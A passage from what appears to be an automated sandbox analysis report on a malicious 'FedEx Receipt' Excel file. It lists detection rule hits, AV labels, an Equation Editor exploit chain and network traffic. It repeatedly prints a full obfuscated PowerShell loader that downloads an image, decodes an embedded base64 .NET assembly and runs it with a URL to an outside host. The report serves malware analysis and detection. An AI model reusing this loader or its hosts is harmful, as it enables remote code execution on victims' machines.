'+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1220, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS" , ProcessId: 3616, ProcessName: wscript.exe
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1220, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3288, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3688, TargetFilename: C:\Users\user\AppData\Local\Temp\g1pg51ke.vno.ps1

            Data Obfuscation

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar
            Timestamp:07/02/24-07:52:49.355011
            SID:2049038
            Source Port:80
            Destination Port:49175
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://ilang.in/BrlcByXAvira URL Cloud: Label: malware
            Source: http://ilang.in/BrlcBAvira URL Cloud: Label: malware
            Source: http://ilang.in/Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3A50CEE2-6F27-47C4-9BA8-0FD0C2B7AD90}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Source: FedEx Receipt_53065724643.xlsVirustotal: Detection: 29%Perma Link
            Source: FedEx Receipt_53065724643.xlsReversingLabs: Detection: 28%
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: FedEx Receipt_53065724643.xlsJoe Sandbox ML: detected

            Exploits

            barindex
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 23.95.235.16 Port: 80Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknownHTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49176 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49179 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: RunPE.pdb source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.473348912.0000000000280000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_036406FA LoadLibraryW,7_2_036406FA
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_036407D9 ShellExecuteW,ExitProcess,7_2_036407D9
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess,7_2_036407AB
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_036407FE ExitProcess,7_2_036407FE
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_036407C4 ShellExecuteW,ExitProcess,7_2_036407C4
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_03640615 ExitProcess,7_2_03640615
            Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: global trafficDNS query: name: ilang.in
            Source: global trafficDNS query: name: ilang.in
            Source: global trafficDNS query: name: ilang.in
            Source: global trafficDNS query: name: ilang.in
            Source: global trafficDNS query: name: ilang.in
            Source: global trafficDNS query: name: ilang.in
            Source: global trafficDNS query: name: uploaddeimagens.com.br
            Source: global trafficDNS query: name: ilang.in
            Source: global trafficDNS query: name: ilang.in
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
